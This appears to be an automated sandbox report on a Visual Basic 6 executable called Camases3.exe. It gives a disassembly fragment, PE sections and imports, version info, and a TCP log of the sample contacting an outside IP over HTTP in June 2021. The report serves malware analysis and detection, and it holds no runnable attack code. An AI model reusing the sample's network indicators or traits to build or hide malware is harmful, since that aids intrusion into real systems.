add byte ptr [eax], al
add byte ptr [edx], al
add edi, dword ptr [eax]
or byte ptr [ecx+00h], al
push eax
popad
outsb
popad
insd
popad
outsb
jnc 00007F430CA364BDh
cmp byte ptr [eax], al
add eax, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
add bh, al
shr byte ptr [ecx], 1
or al, byte ptr [ecx-48BA903Bh]
int1
mov eax, dword ptr [5110246Bh]
test eax, 7561C1ECh
and byte ptr [ebx+eax*8], dl
inc edx
lahf
leave
ror dword ptr [edi+585AC9C0h], 1
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
test dword ptr [esi], eax
add byte ptr [eax], al
add byte ptr [esi], 00000000h
add byte ptr [eax], al
or eax, 52455600h
push ebx
inc ebp
push edx
dec ecx
dec esi
inc edi
inc ebp
push edx
dec esi
inc ebp
add byte ptr [47000501h], cl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18574	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1b000	0x9c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x17c38	0x18000	False	0.469492594401	data	6.6051840279	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x19000	0x121c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1b000	0x9c8	0x1000	False	0.227294921875	data	2.1041800969	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1b6e0	0x2e8	data
RT_ICON	0x1b4f8	0x1e8	data
RT_ICON	0x1b3d0	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x1b3a0	0x30	data
RT_VERSION	0x1b150	0x250	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaInStr, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaStrComp, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Camases3
FileVersion	1.00
CompanyName	MarbleStone
Comments	MarbleStone
ProductName	Panamansk8
ProductVersion	1.00
OriginalFilename	Camases3.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 7, 2021 20:43:35.189440966 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.354955912 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.355103970 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.357248068 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.527606010 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.553634882 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.553683043 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.553711891 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.553736925 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.553750992 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.553765059 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.553795099 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.553821087 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.553843975 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.553863049 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.553868055 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.553869963 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.553870916 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.553894043 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.553936958 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.553940058 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.553941965 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.717907906 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.717950106 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.717978001 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718003988 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718030930 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718058109 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718067884 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718081951 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718086004 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718089104 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718120098 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718147039 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718152046 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718156099 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718173027 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718199968 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718216896 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718221903 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718224049 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718225956 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718251944 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718277931 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718290091 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718295097 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718297958 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718308926 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718338013 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718364000 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718374968 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718379021 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718381882 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718389034 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718415022 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718441010 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.718461037 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718465090 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.718466997 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.721843958 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894362926 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894419909 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894452095 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894478083 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894494057 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894504070 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894530058 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894556046 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894581079 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894603014 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894608021 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894613028 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894614935 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894633055 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894656897 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894680023 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894702911 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894725084 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894730091 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894735098 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894737005 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894750118 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894773960 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894797087 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894821882 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894833088 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894838095 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894840956 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894846916 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894869089 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894891977 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894903898 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894907951 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894916058 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894918919 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894939899 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894957066 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894961119 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.894963026 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.894989967 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895019054 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895029068 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895034075 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895036936 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895046949 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895071983 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895097017 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895097017 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895102024 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895138979 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895164967 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895184994 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895184994 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895190001 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895205975 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895230055 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895252943 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895276070 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895292044 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895297050 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895299911 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895302057 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895329952 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895351887 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895371914 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895374060 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:35.895378113 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895380020 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895901918 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:35.895911932 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.061364889 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061408997 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061434984 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061455965 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061482906 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061506987 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061531067 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061553001 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061575890 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061599970 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061618090 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061625004 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.061640978 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061655045 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.061659098 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.061666012 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061690092 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061712027 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.061712980 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061716080 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.061736107 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061758995 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061784029 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061804056 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.061808109 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.061810970 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061836958 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061862946 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061866999 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.061870098 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.061889887 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061918020 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061924934 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.061928988 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.061945915 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061970949 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.061980009 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.061983109 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.062000990 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.062026978 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.062028885 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.062038898 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.062052965 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.062072039 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:36.062119961 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.062123060 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:36.062124968 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:40.896296978 CEST	80	49732	192.185.113.219	192.168.2.6
Jun 7, 2021 20:43:40.896398067 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:43:41.388775110 CEST	49732	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:07.791374922 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:07.893838882 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:07.955684900 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:07.955879927 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:07.958627939 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.053404093 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.053538084 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.057746887 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.122638941 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.127895117 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.127933979 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.127958059 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.127974033 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.127979040 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.128000975 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.128021955 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.128031015 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.128046989 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.128068924 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.128091097 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.128102064 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.128112078 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.128180027 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.220063925 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.229717016 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.229753017 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.229773998 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.229793072 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.229809046 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.229808092 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.229825020 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.229844093 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.229860067 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.229875088 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.229876041 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.229892015 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.229909897 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.229935884 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.294126987 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294154882 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294173002 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294188976 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294209957 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294228077 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294243097 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294245958 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.294258118 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294271946 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.294275045 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294291019 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294306040 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294321060 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294328928 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.294342041 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294359922 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294368982 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.294374943 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294392109 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294399023 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.294408083 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294424057 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294424057 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.294440031 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294456005 CEST	80	49753	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.294478893 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.294522047 CEST	49753	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.389385939 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389427900 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389448881 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389470100 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389487982 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.389491081 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389507055 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.389512062 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389539003 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389559984 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.389560938 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389581919 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389590025 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.389602900 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389624119 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389631033 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.389643908 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389663935 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389667988 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.389684916 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389694929 CEST	49754	80	192.168.2.6	192.185.113.219
Jun 7, 2021 20:45:08.389708996 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389729977 CEST	80	49754	192.185.113.219	192.168.2.6
Jun 7, 2021 20:45:08.389736891 CEST	49754	80	192.168.2.6	192.185.113.219
